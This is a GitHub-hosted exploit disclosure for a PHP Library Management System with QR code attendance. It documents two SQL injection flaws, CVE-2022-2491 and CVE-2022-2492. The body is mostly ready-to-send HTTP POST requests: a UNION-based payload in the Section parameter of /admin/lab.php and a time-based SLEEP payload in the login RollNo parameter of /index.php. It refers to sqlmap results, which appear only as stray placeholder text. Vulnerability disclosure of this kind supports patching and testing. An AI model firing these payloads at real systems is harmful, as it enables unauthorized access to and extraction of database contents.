Skip to content

Latest commit

 

History

History
54 lines (42 loc) · 1.92 KB

Library-Management-System-with-QR-code-Attendance-and-Auto-Generate-Library-Card.md

File metadata and controls

54 lines (42 loc) · 1.92 KB

Exploit Title: Library Management System with QR code Attendance and Auto Generate Library Card - Multiple SQL injections

Date: 2022-07/20

Exploit Author: xiahao@webray.com.cn

Version: 1.0

Tested on: windows10 + phpstudy

1./admin/lab.php(CVE-2022-2491)

/lab.php SQL injection exists for parameter Section

Sample request POC #1

POST /admin/lab.php HTTP/1.1
Host: [IP:PORT]
Connection: close
Content-Length: 208
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: null
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

submit=1&Section=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71716b7171,0x546e4444736b7743575a666d4873746a6450616261527a67627944426946507245664143694c6a4c,0x7162706b71),NULL,NULL,NULL,NULL#&Status=1

Sqlmap running results

blockchain

2./index.php(CVE-2022-2492)

/index.php SQL injection exists for parameter RollNo

Sample request POC #2

POST /index.php HTTP/1.1
Host: www.l-ms.com
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

RollNo=admin' AND (SELECT 2625 FROM (SELECT(SLEEP(5)))MdIL) AND 'KXmq'='KXmq&Password=1231312312&signin=Sign In

Sqlmap running results

blockchain